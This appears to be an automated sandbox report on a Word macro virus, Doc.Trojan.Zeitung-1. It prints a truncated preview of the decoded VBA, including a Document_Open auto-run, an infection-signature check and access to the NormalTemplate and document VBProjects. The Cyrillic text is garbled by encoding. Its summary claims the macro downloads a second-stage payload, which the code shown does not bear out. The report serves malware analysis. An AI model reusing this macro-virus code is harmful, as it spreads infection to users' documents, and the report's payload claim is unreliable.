MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a malicious VBA macro that is automatically executed by the Document_Open subroutine. This macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Trojan.Zeitung-1' and the presence of VBA code that manipulates the NormalTemplate and ActiveDocument VBProjects. The macro's intent is to compromise the user's system by fetching and running additional malicious code.
Heuristics 3
-
ClamAV: Doc.Trojan.Zeitung-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Zeitung-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30345 bytes |
SHA-256: 3fa2dc84df7e93872c9b96b35173d7e19942761803785392b8ff0978de372db1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" '耔沩囹箴?忤痼襦
'梵 钿?狸溟皂疴觊 腙噤 翦? 栲胴螂釦吗耨玎?疣?栲羼?厘耥鹋痨忤条?噜
'2
'眍戾?2 玎 2000 泐
Dim sd, reg As Boolean
Private Function Kontaminat(O)
If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
Kontaminat = 0
Else
If O.codemodule.countoflines < 50 Then
Kontaminat = 0
Else
Ant$ = Trim(O.codemodule.lines(3, 1))
Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
If Val(Ant$) < 65535 Then
Kontaminat = Val(Ant$)
Else
Kontaminat = -1
End If
End If
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim ad, nt As Object
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
If Mid(ActiveDocument.Name, 1, 12) = "冷耜栝 钽铐? Then
Exit Sub
End If
reg = False
p = 0.05
Tag$ = ""
Monat$ = ""
datum$ = Trim(Date)
i = 1
While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
Tag$ = Tag$ + Mid(datum$, i, 1)
i = i + 1
Wend
i = i + 1
While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
Monat$ = Monat$ + Mid(datum$, i, 1)
i = i + 1
Wend
If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2 翦怵嚯�
If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 爨痱
If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 囡疱?
If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 棹?
If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2 噔泱耱
If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 皴眚�狃�
If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 铌?狃�
If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 溴赅狃�
If Rnd >= p Then
Exit Sub
End If
Documents.Add Template:="Normal", NewTemplate:=False
With ActiveDocument.PageSetup
.LineNumbering.Active = False
.Orientation = wdOrientPortrait
.TopMargin = CentimetersToPoints(1.5)
.BottomMargin = CentimetersToPoints(1.5)
.LeftMargin = CentimetersToPoints(2.5)
.RightMargin = CentimetersToPoints(2)
.Gutter = CentimetersToPoints(0)
.HeaderDistance = CentimetersToPoints(1.25)
.FooterDistance = CentimetersToPoints(1.25)
.PageWidth = CentimetersToPoints(21)
.PageHeight = CentimetersToPoints(29.7)
.FirstPageTray = wdPrinterDefaultBin
.OtherPagesTray = wdPrinterDefaultBin
.SectionStart = wdSectionNewPage
.OddAndEvenPagesHeaderFooter = False
.DifferentFirstPageHeaderFooter = False
.VerticalAlignment = wdAlignVerticalTop
.SuppressEndnotes = False
.MirrorMargins = False
End With
Druck_0 "?????? ?????, 40, True, wdAlignParagraphCenter, 0, False"
Druck_0 "妈痼耥? 汔珏蜞 皴牝?桁. 逆. 蔫 ?? 叔腚?", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "蔓躅?镱 戾疱 觐祜脲牝钼囗? 眍戾疣", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "10 爨� 2000 ? ?2 (2)", 18, False, wdAlignParagraphLeft, 0, True
Selection.TypeParagraph
Druck_0 "彦泐漤� ?眍戾疱:", 18, True, wdAlignParagraphLeft, 0, True
Druck_0 "* 添屙? 麒蜞蝈脲??汔珏蝈. (项溽铕赅 桧蝈疴��)", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "* 橡邃腩驽龛� 镱 箅篦�屙�?疣犷螓 汔珏螓:", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 帖 耦忮瘌屙耱怏屐 疋铋 忤痼?", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 袜耔朦眍 扈?礤 狍溴��.", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 砚铋 忤痼?- 疋铊扈 痼赅扈. ", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 帖 - 忄? 恹 - 磬?(?镳钺脲爨?钺疣蝽铋 疋�玷). ", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "* 袜�� 镫囗?", 18, False, wdAlignParagraphLeft, 0, True
Selection.TypeParagraph
Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0, True
Selection.TypeParagraph
vb = 1
ve = 1
reg = True
vb = Artikel_B(nt, vb, 1)
ve = Artikel_E(nt, vb + 1)
Selection.TypeParagraph
Druck_0 nt.codem
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.